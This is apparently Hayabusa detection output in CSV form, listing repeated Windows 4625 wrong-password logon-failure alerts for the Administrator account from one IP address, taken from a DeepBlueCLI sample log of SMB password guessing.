+2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQelUX0kwLfpJnr0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t88CBspQqbiO1IPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: 
